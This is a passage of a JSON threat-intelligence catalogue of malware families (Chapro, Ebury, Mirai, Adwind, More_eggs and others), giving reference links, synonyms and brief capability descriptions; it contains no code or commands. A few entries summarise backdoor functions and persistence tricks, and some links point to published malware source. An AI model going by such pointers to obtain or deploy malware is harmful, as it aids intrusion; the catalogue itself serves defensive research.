"https://malpedia.caad.fkie.fraunhofer.de/details/elf.chapro", "http://contagiodump.blogspot.com/2012/12/dec-2012-linuxchapro-trojan-apache.html", "http://blog.eset.com/2012/12/18/malicious-apache-module-used-for-content-injection-linuxchapro-a" ], "synonyms": [], "type": [] }, "uuid": "700366d8-4036-4e48-9a5f-bd6e09fb9b6b", "value": "Chapro" }, { "description": "This was observed to be pushed by IoT malware, abusing devices for LiteCoin and BitCoin mining.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.cpuminer", "https://github.com/pooler/cpuminer" ], "synonyms": [], "type": [] 
}, "uuid": "8a42a699-1746-498b-a558-e7113bb916c0", "value": "Cpuminer (ELF)" }, { "description": "This payload has been used to compromise kernel.org back in August of 2011 and has hit cPanel Support which in turn, has infected quite a few cPanel servers. It is a credential stealing payload which steals SSH keys, passwords, and potentially other credentials.\r\n\r\nThis family is part of a wider range of tools which are described in detail in the operation windigo whitepaper by ESET.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.ebury", "https://www.welivesecurity.com/wp-content/uploads/2014/03/operation_windigo.pdf", "https://www.welivesecurity.com/2017/10/30/windigo-ebury-update-2/", "https://www.justice.gov/opa/pr/russian-citizen-pleads-guilty-involvement-global-botnet-conspiracy", "https://www.welivesecurity.com/2014/02/21/an-in-depth-analysis-of-linuxebury/" ], "synonyms": [], "type": [] }, "uuid": "ce79265c-a467-4a17-b27d-7ec7954688d5", "value": "Ebury" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.erebus", "https://blog.trendmicro.com/trendlabs-security-intelligence/erebus-resurfaces-as-linux-ransomware/" ], "synonyms": [], "type": [] }, "uuid": "479353aa-c6d7-47a7-b5f0-3f97fd904864", "value": "Erebus (ELF)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.ext4", "https://www.recordedfuture.com/chinese-cyberespionage-operations/" ], "synonyms": [], "type": [] }, "uuid": "79b2b3c0-6119-4511-9c33-2a48532b6a60", "value": "ext4" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.haiduc", "https://documents.trendmicro.com/assets/Perl-Based_Shellbot_Looks_to_Target_Organizations_via_C&C_appendix.pdf" ], "synonyms": [], "type": [] }, "uuid": "dd85732f-cbf8-4f2c-af5c-f51ef7d99b6a", "value": "Haiduc" }, { "description": "", "meta": { "refs": [ 
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.hajime", "https://security.rapiditynetworks.com/publications/2016-10-16/hajime.pdf", "https://honeynet.org/sites/default/files/Bots_Keep_Talking_To_Us.pdf", "https://x86.re/blog/hajime-a-follow-up/", "http://blog.netlab.360.com/hajime-status-report-en/", "https://www.symantec.com/connect/blogs/hajime-worm-battles-mirai-control-internet-things", "https://security.radware.com/WorkArea/DownloadAsset.aspx?id=1461", "https://blog.netlab.360.com/quick-summary-port-8291-scan-en/", "https://github.com/Psychotropos/hajime_hashes" ], "synonyms": [], "type": [] }, "uuid": "ff8ee85f-4175-4f5a-99e5-0cbc378f1489", "value": "Hajime" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.hakai", "https://researchcenter.paloaltonetworks.com/2018/07/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns/" ], "synonyms": [], "type": [] }, "uuid": "0839c28a-ea11-44d4-93d1-24b246ef6743", "value": "Hakai" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.hideandseek", "https://www.bleepingcomputer.com/news/security/hide-and-seek-becomes-first-iot-botnet-capable-of-surviving-device-reboots/", "https://labs.bitdefender.com/2018/01/new-hide-n-seek-iot-botnet-using-custom-built-peer-to-peer-communication-spotted-in-the-wild/", "https://blog.netlab.360.com/hns-botnet-recent-activities-en/", "https://www.bleepingcomputer.com/news/security/hns-evolves-from-iot-to-cross-platform-botnet/", "https://labs.bitdefender.com/2018/05/hide-and-seek-iot-botnet-resurfaces-with-new-tricks-persistence/", "https://www.bleepingcomputer.com/news/security/new-hns-iot-botnet-has-already-amassed-14k-bots/" ], "synonyms": [ "HNS" ], "type": [] }, "uuid": "41bf8f3e-bb6a-445d-bb74-d08aae61a94b", "value": "Hide and Seek" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.iot_reaper", 
"http://blog.netlab.360.com/iot_reaper-a-rappid-spreading-new-iot-botnet-en/", "https://krebsonsecurity.com/2017/10/reaper-calm-before-the-iot-security-storm", "https://research.checkpoint.com/new-iot-botnet-storm-coming/", "https://embedi.com/blog/grim-iot-reaper-1-and-0-day-vulnerabilities-at-the-service-of-botnets/" ], "synonyms": [ "IoTroop", "Reaper" ], "type": [] }, "uuid": "37c357a1-ec09-449f-b5a9-c1ef1fba2de2", "value": "IoT Reaper" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.jenx", "https://blog.radware.com/security/2018/02/jenx-los-calvos-de-san-calvicie/" ], "synonyms": [], "type": [] }, "uuid": "6a4365fc-8448-4270-ba93-0341788d004b", "value": "JenX" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.kaiten", "https://www.akamai.com/us/en/multimedia/documents/state-of-the-internet/kaiten-std-router-ddos-malware-threat-advisory.pdf" ], "synonyms": [ "STD" ], "type": [] }, "uuid": "9b618703-58f6-4f0b-83a4-d4f13e2e5d12", "value": "Kaiten" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.lady", "https://news.drweb.com/news/?i=10140&lng=en" ], "synonyms": [], "type": [] }, "uuid": "f8b91c34-b4f0-4ef2-b9fb-15bd5ec0a66d", "value": "Lady" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.mikey", "http://www.morphick.com/resources/lab-blog/mikey-linux-keylogger" ], "synonyms": [], "type": [] }, "uuid": "aae3b83d-a116-4ebc-aae0-f6327ef174ea", "value": "MiKey" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai", "https://www.bleepingcomputer.com/news/security/mirai-activity-picks-up-once-more-after-publication-of-poc-exploit-code/", "http://osint.bambenekconsulting.com/feeds/", "https://krebsonsecurity.com/2017/12/mirai-iot-botnet-co-authors-plead-guilty/", 
"https://honeynet.org/sites/default/files/Bots_Keep_Talking_To_Us.pdf", "https://krebsonsecurity.com/2016/10/source-code-for-iot-botnet-mirai-released/", "https://isc.sans.edu/diary/22786", "https://github.com/jgamblin/Mirai-Source-Code", "http://www.simonroses.com/2016/10/mirai-ddos-botnet-source-code-binary-analysis/", "https://researchcenter.paloaltonetworks.com/2018/07/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns/" ], "synonyms": [], "type": [] }, "uuid": "17e12216-a303-4a00-8283-d3fe92d0934c", "value": "Mirai (ELF)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.mokes", "https://securelist.com/from-linux-to-windows-new-family-of-cross-platform-desktop-backdoors-discovered/73503/" ], "synonyms": [], "type": [] }, "uuid": "6d5a5357-4126-4950-b8c3-ee78b1172217", "value": "Mokes (ELF)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.moose", "http://www.welivesecurity.com/2015/05/26/moose-router-worm/", "http://gosecure.net/2016/11/02/exposing-the-ego-market-the-cybercrime-performed-by-the-linux-moose-botnet/", "http://www.welivesecurity.com/2016/11/02/linuxmoose-still-breathing/" ], "synonyms": [], "type": [] }, "uuid": "7fdb91ea-52dc-499c-81f9-3dd824e2caa0", "value": "Moose" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.mrblack", "https://news.drweb.com/?i=5760&c=23&lng=en" ], "synonyms": [], "type": [] }, "uuid": "fc047e32-9cf2-4a92-861a-be882efd8a50", "value": "MrBlack" }, { "description": "Mirai variant by actor \"Anarchy\" that used CVE-2017-17215 in July 2018 to compromise 18,000+ devices.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.owari", "https://www.fortinet.com/blog/threat-research/a-wicked-family-of-bots.html", "https://twitter.com/360Netlab/status/1019759516789821441", "https://twitter.com/hrbrmstr/status/1019922651203227653", 
"https://blog.newskysecurity.com/understanding-the-iot-hacker-a-conversation-with-owari-sora-iot-botnet-author-117feff56863", "https://www.bleepingcomputer.com/news/security/router-crapfest-malware-author-builds-18-000-strong-botnet-in-a-day/", "https://www.scmagazine.com/malware-author-anarchy-builds-18000-strong-huawei-router-botnet/article/782395/", "https://twitter.com/ankit_anubhav/status/1019647993547550720" ], "synonyms": [], "type": [] }, "uuid": "ec67f206-6464-48cf-a012-3cdfc1278488", "value": "Owari" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.penquin_turla", "https://securelist.com/files/2017/04/Penquins_Moonlit_Maze_AppendixB.pdf", "https://twitter.com/juanandres_gs/status/944741575837528064", "https://securelist.com/files/2017/04/Penquins_Moonlit_Maze_PDF_eng.pdf" ], "synonyms": [], "type": [] }, "uuid": "262e0cf2-2fed-4d37-8d7a-0fd62c712840", "value": "Penquin Turla" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.perlbot", "https://documents.trendmicro.com/assets/Perl-Based_Shellbot_Looks_to_Target_Organizations_via_C&C_appendix.pdf" ], "synonyms": [ "DDoS Perl IrcBot", "ShellBot" ], "type": [] }, "uuid": "24b77c9b-7e7e-4192-8161-b6727728170f", "value": "PerlBot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.persirai", "http://blog.trendmicro.com/trendlabs-security-intelligence/persirai-new-internet-things-iot-botnet-targets-ip-cameras/" ], "synonyms": [], "type": [] }, "uuid": "2ee05352-3d4a-448b-825d-9d6c10792bf7", "value": "Persirai" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.r2r2", "https://www.guardicore.com/2018/06/operation-prowli-traffic-manipulation-cryptocurrency-mining/" ], "synonyms": [], "type": [] }, "uuid": "759f8590-a049-4c14-be8a-e6605e2cd43d", "value": "r2r2" }, { "description": "", "meta": { "refs": [ 
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.rakos", "http://www.welivesecurity.com/2016/12/20/new-linuxrakos-threat-devices-servers-ssh-scan/" ], "synonyms": [], "type": [] }, "uuid": "4592384c-48a7-4e16-b492-7add50a7d2f5", "value": "Rakos" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.rex", "https://rednaga.io/2016/09/21/reversing_go_binaries_like_a_pro/", "https://thisissecurity.net/2016/10/28/octopus-rex-evolution-of-a-multi-task-botnet/" ], "synonyms": [], "type": [] }, "uuid": "49639ff5-e0be-4b6a-850b-d5d8dd37e62b", "value": "Rex" }, { "description": "Satori is a variation of elf.mirai which was first detected around 2017-11-27 by 360 Netlab. It uses exploits to exhibit worm-like behaviour to spread over ports 37215 and 52869 (CVE-2014-8361).", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.satori", "https://www.arbornetworks.com/blog/asert/the-arc-of-satori/", "http://blog.netlab.360.com/art-of-steal-satori-variant-is-robbing-eth-bitcoin-by-replacing-wallet-address-en/", "https://blog.radware.com/security/botnets/2018/02/new-satori-botnet-variant-enslaves-thousands-dasan-wifi-routers/", "http://www.eweek.com/security/collaborative-takedown-kills-iot-worm-satori", "http://blog.netlab.360.com/warning-satori-a-new-mirai-variant-is-spreading-in-worm-style-on-port-37215-and-52869-en/", "https://krebsonsecurity.com/2018/09/alleged-satori-iot-botnet-operator-sought-media-spotlight-got-indicted/" ], "synonyms": [], "type": [] }, "uuid": "9e5d83a8-1181-43fe-a77f-28c8c75ffbd0", "value": "Satori" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.shellbind", "http://blog.trendmicro.com/trendlabs-security-intelligence/linux-users-urged-update-new-threat-exploits-sambacry" ], "synonyms": [], "type": [] }, "uuid": "b51caf06-736e-46fc-9b13-48b0b81df4b7", "value": "ShellBind" }, { "description": "", "meta": { "refs": [ 
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.shishiga", "https://www.welivesecurity.com/2017/04/25/linux-shishiga-malware-using-lua-scripts/" ], "synonyms": [], "type": [] }, "uuid": "51da734c-70dd-4337-ab08-ab61457e0da5", "value": "Shishiga" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.spamtorte", "http://cyber.verint.com/resource/spamtorte-v2-investigating-a-multi-layered-spam-botnet/" ], "synonyms": [], "type": [] }, "uuid": "7b9a9ea0-04d2-42ef-b72f-9d6476b9e0d0", "value": "Spamtorte" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.sshdoor", "http://contagiodump.blogspot.com/2013/02/linux-sshdoor-sample.html" ], "synonyms": [], "type": [] }, "uuid": "275d65b9-0894-4c9b-a255-83daddb2589c", "value": "SSHDoor" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.stantinko", "https://www.welivesecurity.com/2017/07/20/stantinko-massive-adware-campaign-operating-covertly-since-2012/" ], "synonyms": [], "type": [] }, "uuid": "e8c131df-ee3b-41d4-992d-71d3090d2d98", "value": "Stantinko" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.torii", "https://blog.avast.com/new-torii-botnet-threat-research" ], "synonyms": [], "type": [] }, "uuid": "a874575e-0ad7-464d-abb6-8f4b7964aa92", "value": "Torii" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.trump_bot", "http://paper.seebug.org/345/" ], "synonyms": [], "type": [] }, "uuid": "feb6a5f6-32f9-447d-af9c-08e499457883", "value": "Trump Bot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.tsunami", "http://researchcenter.paloaltonetworks.com/2017/04/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/", "http://get.cyberx-labs.com/radiation-report", "https://www.8ackprotect.com/blog/big_brother_is_attacking_you" ], 
"synonyms": [ "Amnesia", "Radiation" ], "type": [] }, "uuid": "21540126-d0bb-42ce-9b93-341fedb94cac", "value": "Tsunami" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.turla_rat" ], "synonyms": [], "type": [] }, "uuid": "1b62a421-c0db-4425-bcb2-a4925d5d33e0", "value": "Turla RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.umbreon", "http://blog.trendmicro.com/trendlabs-security-intelligence/pokemon-themed-umbreon-linux-rootkit-hits-x86-arm-systems/", "http://contagiodump.blogspot.com/2018/03/rootkit-umbreon-umreon-x86-arm-samples.html" ], "synonyms": [ "Espeon" ], "type": [] }, "uuid": "637000f7-4363-44e0-b795-9cfb7a3dc460", "value": "Umbreon" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.vpnfilter", "https://blog.talosintelligence.com/2018/06/vpnfilter-update.html?m=1", "https://blog.talosintelligence.com/2018/09/vpnfilter-part-3.html", "https://securelist.com/vpnfilter-exif-to-c2-mechanism-analysed/85721/", "https://blog.trendmicro.com/trendlabs-security-intelligence/vpnfilter-affected-devices-still-riddled-with-19-vulnerabilities", "https://www.justice.gov/opa/pr/justice-department-announces-actions-disrupt-advanced-persistent-threat-28-botnet-infected", "https://blog.talosintelligence.com/2018/05/VPNFilter.html", "https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/sophos-VPN-Filter-analysis-v2.pdf?la=en", "https://www.symantec.com/blogs/threat-intelligence/vpnfilter-iot-malware" ], "synonyms": [], "type": [] }, "uuid": "5ad30da2-2645-4893-acd9-3f8e0fbb5500", "value": "elf.vpnfilter" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.wellmess" ], "synonyms": [], "type": [] }, "uuid": "b0046a6e-3b8b-45ad-a357-dabc46aba7de", "value": "elf.wellmess" }, { "description": "", "meta": { "refs": [ 
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.wirenet", "http://contagiodump.blogspot.com/2012/12/aug-2012-backdoorwirenet-osx-and-linux.html", "https://news.drweb.com/show/?i=2679&lng=en&c=14" ], "synonyms": [], "type": [] }, "uuid": "47a8fedb-fd60-493a-9b7d-082bdb85621e", "value": "Wirenet (ELF)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.xagent", "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/", "http://researchcenter.paloaltonetworks.com/2016/02/a-look-into-fysbis-sofacys-linux-backdoor/", "https://download.bitdefender.com/resources/media/materials/white-papers/en/Bitdefender_In-depth_analysis_of_APT28%E2%80%93The_Political_Cyber-Espionage.pdf", "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf" ], "synonyms": [ "chopstick", "fysbis", "splm" ], "type": [] }, "uuid": "0a7d9d22-a26d-4a2b-ab9b-b296176c3ecf", "value": "X-Agent (ELF)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.xaynnalc", "https://twitter.com/michalmalik/status/846368624147353601" ], "synonyms": [], "type": [] }, "uuid": "32b95dc7-03a6-45ab-a991-466208dd92d2", "value": "Xaynnalc" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.xbash", "https://researchcenter.paloaltonetworks.com/2018/09/unit42-xbash-combines-botnet-ransomware-coinmining-worm-targets-linux-windows/" ], "synonyms": [], "type": [] }, "uuid": "ee54fc1e-c574-4836-8cdb-992ac38cef32", "value": "Xbash" }, { "description": "Linux DDoS C&C Malware", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.xorddos", "https://www.cdnetworks.com/resources/whitepapers/sg/Whitepaper23.pdf", "https://www.fireeye.com/blog/threat-research/2015/02/anatomy_of_a_brutef.html", "https://en.wikipedia.org/wiki/Xor_DDoS" 
], "synonyms": [], "type": [] }, "uuid": "7f9df618-4bd1-44a1-ad88-e5930373aac4", "value": "XOR DDoS" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.zollard", "https://blogs.cisco.com/security/the-internet-of-everything-including-malware" ], "synonyms": [ "darlloz" ], "type": [] }, "uuid": "9218630d-0425-4b18-802c-447a9322990d", "value": "Zollard" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ios.dualtoy", "http://researchcenter.paloaltonetworks.com/2016/09/dualtoy-new-windows-trojan-sideloads-risky-apps-to-android-and-ios-devices/" ], "synonyms": [], "type": [] }, "uuid": "8269e779-db23-4c94-aafb-36ee94879417", "value": "DualToy (iOS)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ios.guiinject", "https://sentinelone.com/blogs/analysis-ios-guiinject-adware-library/" ], "synonyms": [], "type": [] }, "uuid": "d9215579-eee0-4e50-9157-dba7c3214769", "value": "GuiInject" }, { "description": "The iOS malware that is installed over USB by osx.wirelurker", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ios.wirelurker", "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-wirelurker.pdf" ], "synonyms": [], "type": [] }, "uuid": "bc32df24-8e80-44bc-80b0-6a4d55661aa5", "value": "WireLurker (iOS)" }, { "description": "Part of Malware-as-service platform\r\nUsed as a generic name for Java-based RAT\r\nFunctionality\r\n- collect general system and user information \r\n- terminate process\r\n-log keystroke\r\n-take screenshot and access webcam\r\n- steal cache password from local or web forms\r\n- download and execute Malware\r\n- modify registry\r\n- download components\r\n- Denial of Service attacks\r\n- Acquire VPN certificates\r\n\r\nInitial infection vector\r\n1. Email to JAR files attached\r\n2. 
Malspam URL to download the malware\r\n\r\nPersistence\r\n- Runkey - HKCU\\Software\\Microsoft\\Windows\\current version\\run\r\n\r\nHiding\r\nUses attrib.exe \r\n\r\nNotes on Adwind\r\nThe malware is not known to be proxy aware", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/jar.adwind", "https://www.fortinet.com/blog/threat-research/new-jrat-adwind-variant-being-spread-with-package-delivery-scam.html", "http://blog.trendmicro.com/trendlabs-security-intelligence/spam-remote-access-trojan-adwind-jrat", "http://malware-traffic-analysis.net/2017/07/04/index.html", "https://codemetrix.net/decrypting-adwind-jrat-jbifrost-trojan/", "https://gist.github.com/herrcore/8336975475e88f9bc539d94000412885", "https://blog.talosintelligence.com/2018/09/adwind-dodgesav-dde.html" ], "synonyms": [ "AlienSpy", "Frutas", "JBifrost", "JSocket", "Sockrat", "UNRECOM" ], "type": [] }, "uuid": "8eb9d4aa-257a-45eb-8c65-95c18500171c", "value": "AdWind" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/jar.crossrat", "https://objective-see.com/blog/blog_0x28.html", "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf" ], "synonyms": [ "Trupto" ], "type": [] }, "uuid": "bae3a6c7-9e58-47f2-8749-a194675e1c84", "value": "CrossRAT" }, { "description": "jRAT, also known as Jacksbot, is a RAT with history, written in Java. It has support for macOS, Linux, Windows and various BSD. It also has functionality to participate in DDoS-attacks as well as to perform click fraud. 
Note that the Adwind family often is mistakenly labeled as jRAT, because of a red herring reference to jrat.io.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/jar.jrat", "https://blog.trendmicro.com/trendlabs-security-intelligence/jacksbot-has-some-dirty-tricks-up-its-sleeves/", "https://github.com/java-rat", "https://www.intego.com/mac-security-blog/new-multiplatform-backdoor-jacksbot-discovered" ], "synonyms": [ "Jacksbot" ], "type": [] }, "uuid": "f2a9f583-b4dd-4669-8808-49c8bbacc376", "value": "jRAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/jar.jspy", "https://how-to-hack.net/hacking-guides/review-of-jspy-rat-jspy-net/" ], "synonyms": [], "type": [] }, "uuid": "ff24997d-1f17-4f00-b9b8-b3392146540f", "value": "jSpy" }, { "description": "According to SpiderLabs, in May 2015 the \"company\" Quaverse offered a RAT known as Quaverse RAT or QRAT. At around May 2016, this QRAT evolved into another RAT which became known as Qarallax RAT, because its C2 is at qarallax.com. Quaverse also offers a service to encrypt Java payloads (Qrypter), and thus qrypted payloads are sometimes confused with Quaverse RATs (QRAT / Qarallax RAT).", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/jar.qarallax_rat", "http://www.certego.net/en/news/nearly-undetectable-qarallax-rat-spreading-via-spam/", "https://labsblog.f-secure.com/2016/06/07/qarallax-rat-spying-on-us-visa-applicants/" ], "synonyms": [], "type": [] }, "uuid": "e7852eb9-9de9-43d3-9f7e-3821f3b2bf41", "value": "Qarallax RAT" }, { "description": "QRat, also known as Quaverse RAT, was introduced in May 2015 as undetectable (because of multiple layers of obfuscation). It offers the usual functionality (password dumper, file browser, keylogger, screen shots/streaming, ...), and it comes as a SaaS. 
For additional historical context, please see jar.qarallax.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/jar.qrat", "https://www.trustwave.com/Resources/SpiderLabs-Blog/Quaverse-RAT--Remote-Access-as-a-Service/", "https://blogs.forcepoint.com/security-labs/look-qrypter-adwind%E2%80%99s-major-rival-cross-platform-maas-market", "https://www.digitrustgroup.com/java-rat-qrat/" ], "synonyms": [ "Quaverse RAT" ], "type": [] }, "uuid": "ef385825-bfa1-4e8c-b368-522db78cf1bd", "value": "QRat" }, { "description": "Ratty is an open source Java RAT, made available on GitHub and promoted heavily on HackForums. At some point in 2016 / 2017 the original author deleted his repository, but several clones exist.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/jar.ratty", "https://github.com/shotskeber/Ratty" ], "synonyms": [], "type": [] }, "uuid": "da032a95-b02a-4af2-b563-69f686653af4", "value": "Ratty" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.airbreak", "https://www.fireeye.com/blog/threat-research/2018/07/chinese-espionage-group-targets-cambodia-ahead-of-elections.html" ], "synonyms": [], "type": [] }, "uuid": "fd419da6-5c0d-461e-96ee-64397efac63b", "value": "AIRBREAK" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.bateleur", "https://www.proofpoint.com/us/threat-insight/post/fin7carbanak-threat-actor-unleashes-bateleur-jscript-backdoor" ], "synonyms": [], "type": [] }, "uuid": "fb75a753-24ba-4b58-b7ed-2e39b0c68c65", "value": "Bateleur" }, { "description": "According to the GitHub repo, CACTUSTORCH is a JavaScript and VBScript shellcode launcher. 
It will spawn a 32 bit version of the binary specified and inject shellcode into it.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.cactustorch", "https://github.com/mdsecactivebreach/CACTUSTORCH" ], "synonyms": [], "type": [] }, "uuid": "efbb5a7c-8c01-4aca-ac21-8dd614b256f7", "value": "CACTUSTORCH" }, { "description": "WebAssembly-based crypto miner.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.cryptonight", "https://gist.github.com/JohnLaTwC/112483eb9aed27dd2184966711c722ec", "https://twitter.com/JohnLaTwC/status/983011262731714565" ], "synonyms": [], "type": [] }, "uuid": "faa19699-a884-4cd3-a307-36492c8ee77a", "value": "CryptoNight" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.cukiegrab_crx", "http://blog.trendmicro.com/trendlabs-security-intelligence/malicous-chrome-extensions-stealing-roblox-game-currency-sending-cookies-via-discord/" ], "synonyms": [ "Roblox Trade Assist" ], "type": [] }, "uuid": "d47ca107-3e03-4c25-88f9-8156426b7f60", "value": "CukieGrab" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.griffon", "https://twitter.com/ItsReallyNick/status/1059898708286939136" ], "synonyms": [], "type": [] }, "uuid": "85c25380-69d7-4d7e-b279-6b6791fd40bd", "value": "Griffon" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.kopiluwak", "https://www.proofpoint.com/us/threat-insight/post/turla-apt-actor-refreshes-kopiluwak-javascript-backdoor-use-g20-themed-attack", "https://securelist.com/shedding-skin-turlas-fresh-faces/88069/", "https://securelist.com/blog/research/77429/kopiluwak-a-new-javascript-payload-from-turla/" ], "synonyms": [], "type": [] }, "uuid": "2269d37b-87e9-460d-b878-b74a2f4c3537", "value": "KopiLuwak" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.magecart", 
"https://www.riskiq.com/blog/labs/magecart-ticketmaster-breach/" ], "synonyms": [], "type": [] }, "uuid": "f53e404b-0dcd-4116-91dd-cad94fc41936", "value": "magecart" }, { "description": "More_eggs is a JavaScript backdoor used by the Cobalt group. It attempts to connect to its C&C server and retrieve tasks to carry out, some of which are:\r\n- d&exec = download and execute PE file\r\n- gtfo = delete files/startup entries and terminate\r\n- more_eggs = download additional/new scripts\r\n- more_onion = run new script and terminate current script\r\n- more_power = run command shell commands", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.more_eggs", "https://blog.trendmicro.com/trendlabs-security-intelligence/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses/", "https://reaqta.com/2018/03/spear-phishing-campaign-leveraging-msxsl/", "https://www.secureworks.com/blog/cybercriminals-increasingly-trying-to-ensnare-the-big-financial-fish", "https://blog.trendmicro.com/trendlabs-security-intelligence/cobalt-spam-runs-use-macros-cve-2017-8759-exploit/", "https://blog.talosintelligence.com/2018/07/multiple-cobalt-personality-disorder.html", "https://asert.arbornetworks.com/double-the-infection-double-the-fun/", "https://blog.morphisec.com/cobalt-gang-2.0" ], "synonyms": [ "SpicyOmelette" ], "type": [] }, "uuid": "1c3009ff-b9a5-4ac1-859c-9b3b4a66a63f", "value": "More_eggs" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.powmet", "http://blog.trendmicro.com/trendlabs-security-intelligence/look-js_powmet-completely-fileless-malware/" ], "synonyms": [], "type": [] }, "uuid": "9521ceb0-039d-412c-a38b-7bd9ddfc772e", "value": "Powmet" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.scanbox", "https://www.alienvault.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks", 
